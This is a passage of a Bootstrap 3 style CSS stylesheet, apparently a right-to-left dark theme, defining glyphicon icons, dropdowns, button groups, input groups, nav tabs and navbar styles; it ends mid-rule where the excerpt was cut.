.glyphicon-qrcode:before {
  content: "\e039";
}
.glyphicon-barcode:before {
  content: "\e040";
}
.glyphicon-tag:before {
  content: "\e041";
}
.glyphicon-tags:before {
  content: "\e042";
}
.glyphicon-book:before {
  content: "\e043";
}
.glyphicon-bookmark:before {
  content: "\e044";
}
.glyphicon-print:before {
  content: "\e045";
}
.glyphicon-camera:before {
  content: "\e046";
}
.glyphicon-font:before {
  content: "\e047";
}
.glyphicon-bold:before {
  content: "\e048";
}
.glyphicon-italic:before {
  content: "\e049";
}
.glyphicon-text-height:before {
  content: "\e050";
}
.glyphicon-text-width:before {
  content: "\e051";
}
.glyphicon-align-left:before {
  content: "\e052";
}
.glyphicon-align-center:before {
  content: "\e053";
}
.glyphicon-align-right:before {
  content: "\e054";
}
.glyphicon-align-justify:before {
  content: "\e055";
}
.glyphicon-list:before {
  content: "\e056";
}
.glyphicon-indent-left:before {
  content: "\e057";
}
.glyphicon-indent-right:before {
  content: "\e058";
}
.glyphicon-facetime-video:before {
  content: "\e059";
}
.glyphicon-picture:before {
  content: "\e060";
}
.glyphicon-map-marker:before {
  content: "\e062";
}
.glyphicon-adjust:before {
  content: "\e063";
}
.glyphicon-tint:before {
  content: "\e064";
}
.glyphicon-edit:before {
  content: "\e065";
}
.glyphicon-share:before {
  content: "\e066";
}
.glyphicon-check:before {
  content: "\e067";
}
.glyphicon-move:before {
  content: "\e068";
}
.glyphicon-step-backward:before {
  content: "\e069";
}
.glyphicon-fast-backward:before {
  content: "\e070";
}
.glyphicon-backward:before {
  content: "\e071";
}
.glyphicon-play:before {
  content: "\e072";
}
.glyphicon-pause:before {
  content: "\e073";
}
.glyphicon-stop:before {
  content: "\e074";
}
.glyphicon-forward:before {
  content: "\e075";
}
.glyphicon-fast-forward:before {
  content: "\e076";
}
.glyphicon-step-forward:before {
  content: "\e077";
}
.glyphicon-eject:before {
  content: "\e078";
}
.glyphicon-chevron-left:before {
  content: "\e079";
}
.glyphicon-chevron-right:before {
  content: "\e080";
}
.glyphicon-plus-sign:before {
  content: "\e081";
}
.glyphicon-minus-sign:before {
  content: "\e082";
}
.glyphicon-remove-sign:before {
  content: "\e083";
}
.glyphicon-ok-sign:before {
  content: "\e084";
}
.glyphicon-question-sign:before {
  content: "\e085";
}
.glyphicon-info-sign:before {
  content: "\e086";
}
.glyphicon-screenshot:before {
  content: "\e087";
}
.glyphicon-remove-circle:before {
  content: "\e088";
}
.glyphicon-ok-circle:before {
  content: "\e089";
}
.glyphicon-ban-circle:before {
  content: "\e090";
}
.glyphicon-arrow-left:before {
  content: "\e091";
}
.glyphicon-arrow-right:before {
  content: "\e092";
}
.glyphicon-arrow-up:before {
  content: "\e093";
}
.glyphicon-arrow-down:before {
  content: "\e094";
}
.glyphicon-share-alt:before {
  content: "\e095";
}
.glyphicon-resize-full:before {
  content: "\e096";
}
.glyphicon-resize-small:before {
  content: "\e097";
}
.glyphicon-exclamation-sign:before {
  content: "\e101";
}
.glyphicon-gift:before {
  content: "\e102";
}
.glyphicon-leaf:before {
  content: "\e103";
}
.glyphicon-fire:before {
  content: "\e104";
}
.glyphicon-eye-open:before {
  content: "\e105";
}
.glyphicon-eye-close:before {
  content: "\e106";
}
.glyphicon-warning-sign:before {
  content: "\e107";
}
.glyphicon-plane:before {
  content: "\e108";
}
.glyphicon-calendar:before {
  content: "\e109";
}
.glyphicon-random:before {
  content: "\e110";
}
.glyphicon-comment:before {
  content: "\e111";
}
.glyphicon-magnet:before {
  content: "\e112";
}
.glyphicon-chevron-up:before {
  content: "\e113";
}
.glyphicon-chevron-down:before {
  content: "\e114";
}
.glyphicon-retweet:before {
  content: "\e115";
}
.glyphicon-shopping-cart:before {
  content: "\e116";
}
.glyphicon-folder-close:before {
  content: "\e117";
}
.glyphicon-folder-open:before {
  content: "\e118";
}
.glyphicon-resize-vertical:before {
  content: "\e119";
}
.glyphicon-resize-horizontal:before {
  content: "\e120";
}
.glyphicon-hdd:before {
  content: "\e121";
}
.glyphicon-bullhorn:before {
  content: "\e122";
}
.glyphicon-bell:before {
  content: "\e123";
}
.glyphicon-certificate:before {
  content: "\e124";
}
.glyphicon-thumbs-up:before {
  content: "\e125";
}
.glyphicon-thumbs-down:before {
  content: "\e126";
}
.glyphicon-hand-right:before {
  content: "\e127";
}
.glyphicon-hand-left:before {
  content: "\e128";
}
.glyphicon-hand-up:before {
  content: "\e129";
}
.glyphicon-hand-down:before {
  content: "\e130";
}
.glyphicon-circle-arrow-right:before {
  content: "\e131";
}
.glyphicon-circle-arrow-left:before {
  content: "\e132";
}
.glyphicon-circle-arrow-up:before {
  content: "\e133";
}
.glyphicon-circle-arrow-down:before {
  content: "\e134";
}
.glyphicon-globe:before {
  content: "\e135";
}
.glyphicon-wrench:before {
  content: "\e136";
}
.glyphicon-tasks:before {
  content: "\e137";
}
.glyphicon-filter:before {
  content: "\e138";
}
.glyphicon-briefcase:before {
  content: "\e139";
}
.glyphicon-fullscreen:before {
  content: "\e140";
}
.glyphicon-dashboard:before {
  content: "\e141";
}
.glyphicon-paperclip:before {
  content: "\e142";
}
.glyphicon-heart-empty:before {
  content: "\e143";
}
.glyphicon-link:before {
  content: "\e144";
}
.glyphicon-phone:before {
  content: "\e145";
}
.glyphicon-pushpin:before {
  content: "\e146";
}
.glyphicon-usd:before {
  content: "\e148";
}
.glyphicon-gbp:before {
  content: "\e149";
}
.glyphicon-sort:before {
  content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
  content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
  content: "\e152";
}
.glyphicon-sort-by-order:before {
  content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
  content: "\e154";
}
.glyphicon-sort-by-attributes:before {
  content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
  content: "\e156";
}
.glyphicon-unchecked:before {
  content: "\e157";
}
.glyphicon-expand:before {
  content: "\e158";
}
.glyphicon-collapse-down:before {
  content: "\e159";
}
.glyphicon-collapse-up:before {
  content: "\e160";
}
.glyphicon-log-in:before {
  content: "\e161";
}
.glyphicon-flash:before {
  content: "\e162";
}
.glyphicon-log-out:before {
  content: "\e163";
}
.glyphicon-new-window:before {
  content: "\e164";
}
.glyphicon-record:before {
  content: "\e165";
}
.glyphicon-save:before {
  content: "\e166";
}
.glyphicon-open:before {
  content: "\e167";
}
.glyphicon-saved:before {
  content: "\e168";
}
.glyphicon-import:before {
  content: "\e169";
}
.glyphicon-export:before {
  content: "\e170";
}
.glyphicon-send:before {
  content: "\e171";
}
.glyphicon-floppy-disk:before {
  content: "\e172";
}
.glyphicon-floppy-saved:before {
  content: "\e173";
}
.glyphicon-floppy-remove:before {
  content: "\e174";
}
.glyphicon-floppy-save:before {
  content: "\e175";
}
.glyphicon-floppy-open:before {
  content: "\e176";
}
.glyphicon-credit-card:before {
  content: "\e177";
}
.glyphicon-transfer:before {
  content: "\e178";
}
.glyphicon-cutlery:before {
  content: "\e179";
}
.glyphicon-header:before {
  content: "\e180";
}
.glyphicon-compressed:before {
  content: "\e181";
}
.glyphicon-earphone:before {
  content: "\e182";
}
.glyphicon-phone-alt:before {
  content: "\e183";
}
.glyphicon-tower:before {
  content: "\e184";
}
.glyphicon-stats:before {
  content: "\e185";
}
.glyphicon-sd-video:before {
  content: "\e186";
}
.glyphicon-hd-video:before {
  content: "\e187";
}
.glyphicon-subtitles:before {
  content: "\e188";
}
.glyphicon-sound-stereo:before {
  content: "\e189";
}
.glyphicon-sound-dolby:before {
  content: "\e190";
}
.glyphicon-sound-5-1:before {
  content: "\e191";
}
.glyphicon-sound-6-1:before {
  content: "\e192";
}
.glyphicon-sound-7-1:before {
  content: "\e193";
}
.glyphicon-copyright-mark:before {
  content: "\e194";
}
.glyphicon-registration-mark:before {
  content: "\e195";
}
.glyphicon-cloud-download:before {
  content: "\e197";
}
.glyphicon-cloud-upload:before {
  content: "\e198";
}
.glyphicon-tree-conifer:before {
  content: "\e199";
}
.glyphicon-tree-deciduous:before {
  content: "\e200";
}
.caret {
  display: inline-block;
  width: 0;
  height: 0;
  margin-right: 2px;
  vertical-align: middle;
  border-top: 4px solid;
  border-left: 4px solid transparent;
  border-right: 4px solid transparent;
}
.dropdown {
  position: relative;
}
.dropdown-toggle:focus {
  outline: 0;
}
.dropdown-menu {
  position: absolute;
  top: 100%;
  right: 0;
  z-index: 1000;
  display: none;
  float: right;
  min-width: 160px;
  padding: 5px 0;
  margin: 2px 0 0;
  list-style: none;
  font-size: 14px;
  background-color: #222222;
  border: 1px solid #555555;
  border: 1px solid #080808;
  border-radius: 4px;
  -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  background-clip: padding-box;
}
.dropdown-menu.pull-right {
  left: 0;
  right: auto;
}
.dropdown-menu .divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #333333;
}
.dropdown-menu > li > a {
  display: block;
  padding: 3px 20px;
  clear: both;
  font-weight: normal;
  line-height: 1.428571429;
  color: #878787;
  white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #2d2d2d;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
  color: #ffffff;
  text-decoration: none;
  outline: 0;
  background-color: #0077bb;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  color: #5a5a5a;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  text-decoration: none;
  background-color: transparent;
  background-image: none;
  filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
  cursor: not-allowed;
}
.open > .dropdown-menu {
  display: block;
}
.open > a {
  outline: 0;
}
.dropdown-header {
  display: block;
  padding: 3px 20px;
  font-size: 12px;
  line-height: 1.428571429;
  color: #5a5a5a;
}
.dropdown-backdrop {
  position: fixed;
  right: 0;
  left: 0;
  bottom: 0;
  top: 0;
  z-index: 990;
}
.pull-right > .dropdown-menu {
  left: 0;
  right: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
  border-top: 0;
  border-bottom: 4px solid;
  content: "";
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
  top: auto;
  bottom: 100%;
  margin-bottom: 1px;
}
@media (min-width: 768px) {
  .navbar-right .dropdown-menu {
    left: 0;
    right: auto;
  }
}
.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  float: right;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
  z-index: 2;
}
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus {
  outline: none;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
  margin-right: -1px;
}
.btn-toolbar:before,
.btn-toolbar:after {
  content: " ";
  display: table;
}
.btn-toolbar:after {
  clear: both;
}
.btn-toolbar:before,
.btn-toolbar:after {
  content: " ";
  display: table;
}
.btn-toolbar:after {
  clear: both;
}
.btn-toolbar .btn-group {
  float: right;
}
.btn-toolbar > .btn + .btn,
.btn-toolbar > .btn-group + .btn,
.btn-toolbar > .btn + .btn-group,
.btn-toolbar > .btn-group + .btn-group {
  margin-right: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.btn-group > .btn:first-child {
  margin-right: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.btn-group > .btn-group {
  float: right;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group > .btn-group:first-child > .btn:last-child,
.btn-group > .btn-group:first-child > .dropdown-toggle {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.btn-group > .btn-group:last-child > .btn:first-child {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
  outline: 0;
}
.btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 3px;
}
.btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 3px;
}
.btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 6px;
}
.btn-group > .btn + .dropdown-toggle {
  padding-right: 8px;
  padding-left: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
  padding-right: 12px;
  padding-left: 12px;
}
.btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn .caret {
  margin-right: 0;
}
.btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after {
  content: " ";
  display: table;
}
.btn-group-vertical > .btn-group:after {
  clear: both;
}
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after {
  content: " ";
  display: table;
}
.btn-group-vertical > .btn-group:after {
  clear: both;
}
.btn-group-vertical > .btn-group > .btn {
  float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-right: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-left-radius: 4px;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
  border-bottom-right-radius: 4px;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child > .btn:last-child,
.btn-group-vertical > .btn-group:first-child > .dropdown-toggle {
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group-vertical > .btn-group:last-child > .btn:first-child {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
  float: none;
  display: table-cell;
  width: 1%;
}
.btn-group-justified > .btn-group .btn {
  width: 100%;
}
[data-toggle="buttons"] > .btn > input[type="radio"],
[data-toggle="buttons"] > .btn > input[type="checkbox"] {
  display: none;
}
.input-group {
  position: relative;
  display: table;
  border-collapse: separate;
}
.input-group[class*="col-"] {
  float: none;
  padding-right: 0;
  padding-left: 0;
}
.input-group .form-control {
  width: 100%;
  margin-bottom: 0;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 6px;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn {
  height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 3px;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn {
  height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
  display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.input-group-addon,
.input-group-btn {
  width: 1%;
  white-space: nowrap;
  vertical-align: middle;
}
.input-group-addon {
  padding: 6px 12px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1;
  color: #4b4b4b;
  text-align: center;
  background-color: #878787;
  border: 1px solid #1f1f1f;
  border-radius: 4px;
}
.input-group-addon.input-sm {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 3px;
}
.input-group-addon.input-lg {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 6px;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
  margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle) {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.input-group-addon:first-child {
  border-left: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child) {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.input-group-addon:last-child {
  border-right: 0;
}
.input-group-btn {
  position: relative;
  white-space: nowrap;
}
.input-group-btn:first-child > .btn {
  margin-left: -1px;
}
.input-group-btn:last-child > .btn {
  margin-right: -1px;
}
.input-group-btn > .btn {
  position: relative;
}
.input-group-btn > .btn + .btn {
  margin-right: -4px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:active {
  z-index: 2;
}
.nav {
  margin-bottom: 0;
  padding-right: 0;
  list-style: none;
}
.nav:before,
.nav:after {
  content: " ";
  display: table;
}
.nav:after {
  clear: both;
}
.nav:before,
.nav:after {
  content: " ";
  display: table;
}
.nav:after {
  clear: both;
}
.nav > li {
  position: relative;
  display: block;
}
.nav > li > a {
  position: relative;
  display: block;
  padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
  text-decoration: none;
  background-color: #878787;
}
.nav > li.disabled > a {
  color: #5a5a5a;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
  color: #5a5a5a;
  text-decoration: none;
  background-color: transparent;
  cursor: not-allowed;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  background-color: #878787;
  border-color: #ffffff;
}
.nav .nav-divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #e5e5e5;
}
.nav > li > a > img {
  max-width: none;
}
.nav-tabs {
  border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
  float: right;
  margin-bottom: -1px;
}
.nav-tabs > li > a {
  margin-left: 2px;
  line-height: 1.428571429;
  border: 1px solid transparent;
  border-radius: 4px 4px 0 0;
}
.nav-tabs > li > a:hover {
  border-color: #878787 #878787 #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  color: #4b4b4b;
  background-color: #1f1f1f;
  border: 1px solid #dddddd;
  border-bottom-color: transparent;
  cursor: default;
}
.nav-tabs.nav-justified {
  width: 100%;
  border-bottom: 0;
}
.nav-tabs.nav-justified > li {
  float: none;
}
.nav-tabs.nav-justified > li > a {
  text-align: center;
  margin-bottom: 5px;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  right: auto;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-tabs.nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs.nav-justified > li > a {
  margin-left: 0;
  border-radius: 4px;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 4px 4px 0 0;
  }
  .nav-tabs.nav-justified > .active > a,
  .nav-tabs.nav-justified > .active > a:hover,
  .nav-tabs.nav-justified > .active > a:focus {
    border-bottom-color: #1f1f1f;
  }
}
.nav-pills > li {
  float: right;
}
.nav-pills > li > a {
  border-radius: 4px;
}
.nav-pills > li + li {
  margin-right: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
  color: #ffffff;
  background-color: #0077bb;
}
.nav-stacked > li {
  float: none;
}
.nav-stacked > li + li {
  margin-top: 2px;
  margin-right: 0;
}
.nav-justified {
  width: 100%;
}
.nav-justified > li {
  float: none;
}
.nav-justified > li > a {
  text-align: center;
  margin-bottom: 5px;
}
.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  right: auto;
}
@media (min-width: 768px) {
  .nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs-justified {
  border-bottom: 0;
}
.nav-tabs-justified > li > a {
  margin-left: 0;
  border-radius: 4px;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 4px 4px 0 0;
  }
  .nav-tabs-justified > .active > a,
  .nav-tabs-justified > .active > a:hover,
  .nav-tabs-justified > .active > a:focus {
    border-bottom-color: #1f1f1f;
  }
}
.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.navbar {
  position: relative;
  min-height: 50px;
  margin-bottom: 20px;
  border: 1px solid transparent;
}
.navbar:before,
.navbar:after {
  content: " ";
  display: table;
}
.navbar:after {
  clear: both;
}
.navbar:before,
.navbar:after {
  content: " ";
  display: table;
}
.navbar:after {
  clear: both;
}
@media (min-width: 768px) {
  .navbar {
    border-radius: 4px;
  }
}
.navbar-header:before,
.navbar-header:after {
  content: " ";
  display: table;
}
.navbar-header:after {
  clear: both;
}
.navbar-header:before,
.navbar-header:after {
  content: " ";
  display: table;
}
.navbar-header:after {
  clear: both;
}
@media (min-width: 768px) {
  .navbar-header {
    float: right;
  }
}
.navbar-collapse {
  max-height: 340px;
  overflow-x: visible;
  padding-left: 15px;
  padding-right: 15px;
  border-top: 1px solid transparent;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
  -webkit-overflow-scrolling: touch;
}
.navbar-collapse:before,
.navbar-collapse:after {
  content: " ";
  display: table;
}
.navbar-collapse:after {
  clear: both;
}
.navbar-collapse:before,
.navbar-collapse:after {
  content: " ";
  display: table;
}
.navbar-collapse:after {
  clear: both;
}
.navbar-collapse.in {
  overflow-y: auto;
}
@media (min-width: 768px) {
  .navbar-collapse {
    width: auto;
    border-top: 0;
    box-shadow: none;
  }
  .navbar-collapse.collapse {
    display: block !important;
    height: auto !important;
    padding-bottom: 0;
    overflow: visible !important;
  }
  .navbar-collapse.in {
    overflow-y: visible;
  }
  .navbar-fixed-top .navbar-collapse,
  .navbar-static-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    padding-right: 0;
    padding-left: 0;
  }
}
.container > .navbar-header,
.container > .navbar-collapse {
  margin-left: -15px;
  margin-right: -15px;
}
@media (min-width: 768px) {
  .container > .navbar-header,
  .container > .navbar-collapse {
    margin-left: 0;
    margin-right: 0;
  }
}
.navbar-static-top {
  z-index: 1000;
  border-width: 0 0 1px;
}
@media (min-width: 768px) {
  .navbar-static-top {
    border-radius: 0;
  }
}
.navbar-fixed-top,
.navbar-fixed-bottom {
  position: fixed;
  left: 0;
  right: 0;
  z-index: 1030;
}
@media (min-width: 768px) {
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    border-radius: 0;
  }
}
.navbar-fixed-top {
  top: 0;
  border-width: 0 0 1px;
}
.navbar-fixed-bottom {
  bottom: 0;
  margin-bottom: 0;
  border-width: 1px 0 0;
}
.navbar-brand {
  float: right;
  padding: 15px 15px;
  font-size: 18px;
  line-height: 20px;
}
.navbar-brand:hover,
.navbar-brand:focus {
  text-decoration: none;
}
@media (min-width: 768px) {
  .navbar > .container .navbar-brand {
    margin-right: -15px;
  }
}
.navbar-toggle {
  position: relative;
  float: left;
  margin-left: 15px;
  padding: 9px 10px;
  margin-top: 8px;
  margin-bottom: 8px;
  background-color: transparent;
  background-image: none;
  border: 1px solid transparent;
  border-radius: 4px;
}
.navbar-toggle .icon-bar {
  display: block;
  width: 22px;
  height: 2px;
  border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
  margin-top: 4px;
}
@media (min-width: 768px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 7.5px -15px;
}
.navbar-nav > li > a {
  padding-top: 10px;
  padding-bottom: 10px;
  line-height: 20px;
}
@media (max-width: 767px) {
  .navbar-nav .open .dropdown-menu {
    position: static;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
  }
  .navbar-nav .open .dropdown-menu > li > a,
  .navbar-nav .open .dropdown-menu .dropdown-header {
    padding: 5px 25px 5px 15px;
  }
  .navbar-nav .open .dropdown-menu > li > a {
    line-height: 20px;
  }
  .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-nav .open .dropdown-menu > li > a:focus {
    background-image: none;
  }
}
@media (min-width: 768px) {
  .navbar-nav {
    float: right;
    margin: 0;
  }
  .navbar-nav > li {
    float: right;
  }
  .navbar-nav > li > a {
    padding-top: 15px;
    padding-bottom: 15px;
  }
  .navbar-nav.navbar-right:last-child {
    margin-left: -15px;
  }
}
@media (min-width: 768px) {
  .navbar-left {
    float: right !important;
  }
  .navbar-right {
    float: left !important;
  }
}
.navbar-form {
  margin-right: -15px;
  margin-left: -15px;
  padding: 10px 15px;
  border-top: 1px solid transparent;
  border-bottom: 1px solid transparent;
  -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  margin-top: 8px;
  margin-bottom: 8px;
}
@media (min-width: 768px) {
  .navbar-form .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .form-control {
    display: inline-block;
  }
  .navbar-form select.form-control {
    width: auto;
  }
  .navbar-form .radio,
  .navbar-form .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    padding-right: 0;
  }
  .navbar-form .radio input[type="radio"],
  .navbar-form .checkbox input[type="checkbox"] {
    float: none;
    margin-right: 0;
  }
}
@media (min-width: 768px) {
  .navbar-form .inputbox,
  .navbar-form select,
  .navbar-form textarea,
  .navbar-form input {
    display: inline-block;
  }
}
@media (max-width: 767px) {
  .navbar-form .form-group {
    margin-bottom: 5px;
  }
}
@media (min-width: 768px) {
  .navbar-form {
    width: auto;
    border: 0;
    margin-right: 0;
    margin-left: 0;
    padding-top: 0;
    padding-bottom: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
  }
  .navbar-form.navbar-right:last-child {
    margin-left: -15px;
  }
}
.navbar-nav > li > .dropdown-menu {
  margin-top: 0;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.navbar-nav.pull-right > li > .dropdown-menu,
.navbar-nav > li > .dropdown-menu.pull-right {
  right: auto;
  left: 0;
}
.navbar-btn {
  margin-top: 8px;
  margin-bottom: 8px;
}
.navbar-btn.btn-sm {
  margin-top: 10px;
  margin-bottom: 10px;
}
.navbar-btn.btn-xs {
  margin-top: 14px;
  margin-bottom: 14px;
}
.navbar-text {
  margin-top: 15px;
  margin-bottom: 15px;
}
@media (min-width: 768px) {
  .navbar-text {
    float: right;
    margin-right: 15px;
    margin-left: 15px;
  }
  .navbar-text.navbar-right:last-child {
    margin-left: 0;
  }
}
.navbar-default {
  background-color: #2d2d2d;
  border-color: #1f1f1f;
}
.navbar-default .navbar-brand {
  color: #5a5a5a;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #878787;
}
.navbar-default .navbar-nav > li > a {
  color: #878787;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
